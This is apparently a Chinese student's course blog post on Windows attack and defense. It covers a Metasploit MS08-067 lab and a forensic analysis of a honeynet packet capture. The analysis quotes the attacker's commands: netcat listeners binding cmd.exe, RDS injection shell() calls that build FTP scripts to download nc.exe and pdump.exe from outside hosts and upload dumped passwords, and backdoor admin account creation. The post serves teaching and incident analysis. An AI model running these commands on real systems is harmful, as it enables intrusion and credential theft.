• 20199302 2019-2020-2 《网络攻防实践》第7周作业


    作业所属课程:https://edu.cnblogs.com/campus/besti/19attackdefense/

    作业要求:https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612

    实践内容

    windows操作系统架构

    网络结构

    站点名称 渗透代码站点网址 分类与索引
    Exploit-db www.exploit-db.com 目录/索引
    packetstorm https://packetstormsecurity.com/ tag/无索引
    securityfocus https://www.securityfocus.com/bid 漏洞目录/索引
    securityreason https://cxsecurity.com/exploit/ 无目录无索引
    securityvulns https://vulners.com/search?query=type:securityvulns&utm_source=securityvulns&utm_medium=redirect 无目录无索引

    ####Windows安全体系结构

    安全机制

    身份认证机制、授权与访问控制机制(注册表)、安全审计机制、其他安全机制(安全中心,网络层IPSec)

    windows远程安全攻防技术

    远程口令猜解攻击

    前提:有大量的弱口令
    SMB文件与打印共享服务。

    常用工具:lefion,enum,SMBGrind,NTScan,XScan,配合以包括高概率口令的字典
    防范:关闭不必要的易受攻击的网络服务;

    配置主机防火墙来限制某些端口服务;
    网络防火墙限制这些服务的访问;

    禁用过时且有安全缺陷的Lanman和NTLM;

    制定强口令策略。

    网络服务远程渗透攻击

    针对Netbios服务的攻击
    针对SMB服务的攻击
    针对MSRPC服务的攻击(远程过程调用)
    针对Windows系统上微软网络的远程渗透攻击
    针对Windows系统上第三方服务的远程渗透攻击
    防范措施:软件设计安全优化、及时更新漏洞、安装增强插件、启用入侵检测工具

    Metasploit渗透测试:

    Windows本地安全攻防技术

    本地提权攻击:

    利用操作系统内核、特权启动程序中的安全缺陷和漏洞

    敏感信息窃取:

    口令密文提取技术:复制口令密文文件,rdisk工具备份、pwdump提取SAM中的口令。

    windows 系统口令字破解技术:

    L0phtCrack

    John the Ripper

    Cain

    防范措施:使用强口令,对明文加密存放

    windows擦除痕迹:

    关闭审计功能

    修改日志

    远程控制和后门

    向受控主机植入第三方远程控制和后门程序

    程序如:冰河、灰鸽子、广外女生、PCshare、磁碟机、BO、BO2K

    工具:命令行工具:Netcat,psexec,meterpreter

    图形化工具:VNC,RemoteAdmin,PCanyware

    实践过程
    Metasploit windows attack
    任务:使用metasploit软件进行windows远程渗透攻击实验。

    内容:使用windows attack/BT4攻击机尝试对Windows metasploitable靶机上的MS08_067漏洞进行远程渗透攻击,获取目标主机访问权。

    MS08_067的描述:

    在winattack上找到metasploit控制台,启动有点慢。

    设置要攻击的漏洞

    设置负载模块,负载包括s远程shell,执行命令,添加用户、上传并执行程序、下载并执行程序、DLL注入、meterpreter控制端、VNC远程控制等。windows/meterpreter/reverse_tcp从目标机器与测试者之间建立一个反向连接:

    设置参数

    之后遇到了这样的问题:fail to load module还有the server responded with error:STATUS_PIPE_NOT_AVAILABLE,好像是因为target的问题,以及honeywall可能时间久了,自己处于不登录的状态,以及目标主机可能卡住了的问题。

    再之后的尝试中,显示no matching target,可能英文版的不适用这个target,所以将靶机换成win2kserver。成功建立会话:

    输入shell,进入远程系统命令行:

    查看所有用户net user:

    做一个劣质的小后门,将guest激活,重设它的密码,并将它设为一个管理员

    使用远程桌面测试一下:

    Win+R mstsc远程桌面,填入靶机IP并连接:

    输入用户名guest和密码root

    确定后进入系统:

    取证分析


    使用wirshark打开该日志文件,可以看到攻击方在用不同的端口与目标靶机的80端口建立连接。

    这条记录中,显示http GET请求,可以看到请求端使用IE5,windows NT 5.0系统。

    攻击机进行查看一些图片的请求。

    图片所标记的位置,看起来有点奇怪,进行追踪一下tcp流:

    在请求中,重复了三次%c0%AF%字段,经过百度,得知这是“/”的Unicode编码,IIS4.0和5.0存在Unicode Directory Traversal Vulnerability。

    对含有这样字符的http请求进行过滤,可以看到Unicode攻击过程:

    先是复制了一个cmd.exe,注意,图中显示的+都是空格。

    之后:将open 213.116.251.162写到ftpcom的脚本中。

    Johna2k写到脚本中。

    nc –l –p 6969 –e cmd1.exe

    nc –l –p 6968 –e cmd1.exe

    nc –l –p 6868 –e cmd1.exe

    在之后又有一波新的轮回,有点不一样的是,这次还写进了压缩文件

    最后删除了这个脚本:

    之后又有一个这样的请求:GET /msadc/ 的目录

    了解到,在IIS服务器中,msadc虚拟目录内有个名为msadcs.dll提供RDS服务,RDS是微软提供的远程访问数据库服务。该系统漏洞允许任意代码执行,GET /msadc/msadcs.dll HTTP是用来探测受害主机上是否有这个漏洞,之后多次进行这样的HTTP会话请求进行SQL注入。

    根据上面字符串,可以看出是一个SQL查询语句,使用|shell(“cmd /c echo werd>>c:fun”)|进行web攻击的SQL注入。红框中这个东西又让人觉得很魔性,像是什么斯巴达!这感叹号用的。
    谷歌上找到一本书中有对这句话的描述:

    可以看出这个语句是脚本里用来做探测用的,把这本书往前翻,看到这里所说的脚本应该是指msadc.p1

    经过观察,每一个url为请求上都有一堆上述的那种东西,过滤一下http.request.uri,可以看到后面的请求中,有shell(“cmd/ c echo hacker2000 >>ftpcom”)

    shell(“cmd/ c echo get samdump.dll >>ftpcom”)

    shell(“cmd/ c echo get pdump.dll >>ftpcom”)

    shell(“cmd/ c echo get nc.exe >>ftpcom”)

    shell(“cmd/ c echo quit >>ftpcom”)

    shell(“cmd/ c ftp –s: ftpcom –n www.nether.net”)

    shell(“cmd/ c pdump.exe >> new.pass”)

    shell(“cmd/ c echo user johna2k >> ftpcom2”)

    shell(“cmd/ c echo hacker2000 >>ftpcom2”)

    shell(“cmd/ c put new pass >> ftpcom2”)

    shell(“cmd/ c echo quit >> ftpcom2”)

    shell(“cmd/ c ftp -s ftpcom2 –n www.nether.net”)

    shell(“cmd/ c ftp 213.116.251.162”)

    Echo open 213.116.251.162 这是让目的主机连接自己

    重复的不再写了。

    echo get samdump.dll >> ftpcom

    ftp –s ftpcom

    Open 212.139.12.26

    Echo johna2k >> sasfile

    Echo haxedj00 >> sasfile

    Echo get pdump.exe >> sasfile

    Echo get samdump.dll

    Echo get nc.exe >>sasfile

    Echo quit >> sasfile

    查看了目的主机上的用户

    net localgroup Domain Admins IWAM KENNY/ADD IWAN主机名是启动iis进程账户

    Net user testuser ugotHacked /ADD应该是加了个用户和密码

    把创建的这个用户名加入到管理员组中

    rdisk -/s 说是rdisk为磁盘修复程序,rdisk /s-用于备份关键系统信息,获得SAM口令文件,SAM是安全账号管理器。

    下面又有rdisk –s 和rdisk ,rdist –s ……
    之后,将SAM放到har.txt文件

    之后再第166个tcp流中找到了对hat.txt的GET请求,在往前翻一个TCP流,没有什么特别,但是进行TCP跟踪,就会看到

    这样的shell操作,可以看到交互情况。大概就是在看文件夹里的内容,然后删掉一些痕迹,复制一些文件下来

    再之后,读到了这样一条消息,到rfp.txt best honeypot I’ve seen till now,攻击者到这时已经知道这是个蜜罐了。
    大概就是两种攻击,一个是unicode编码攻击,一个是根据msadc漏洞的SQL 注入攻击。
    工具pdump.exe nc.exe实现对目标主机的攻击。
    为了防止这样的攻击,就是该打补丁就赶紧打补丁,不需要的远程的服务该关掉就关掉。

    团队对抗实践:windows系统远程渗透攻击与分析
    实践内容和第一个实践内容一样。只是多加了个wireshark监控。用两个IP地址进行过滤。

    MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。
    所以,在两个IP之间的交互中会看到很多的SMB协议的数据包。可以看到,身份认证协议用的是LANMAN,不安全。

    192.168.200.2主动与192.168.200.124建立连接。

    192.168.200.2发起请求。

    源IP 192.168.200.2

    目标IP192.168.200.124 端口445

    攻击发起时间:发送第一个ARP数据包开始

    遇到的问题
    1、选择目标主机不当,浪费了很多时间。

    2、分析log的时候,无从下手,看别人的博客,才静下心来一条一条的看记录。分析过程很差劲,但是大体明白意思


    学习体会
    学习要灵活,开阔眼界,不要钻牛角尖。书到用时方恨少,我要多看书。

    电脑太慢了,下周作业早点做完,把电脑重置一下,重新装软件</font

  • 相关阅读:
    算法视频库下载常用网址(转载)
    Python study 1
    $X-Real-Ip和$X-Forwarded-For的区别
    python装饰器
    python迭代器和生成器
    python函数动态参数详解
    python常用模块
    python 正则re模块
    pycharm5新版注册
    老男孩python自动化运维作业2
  • 原文地址:https://www.cnblogs.com/eosmomo/p/12699442.html
Copyright © 2020-2023  润新知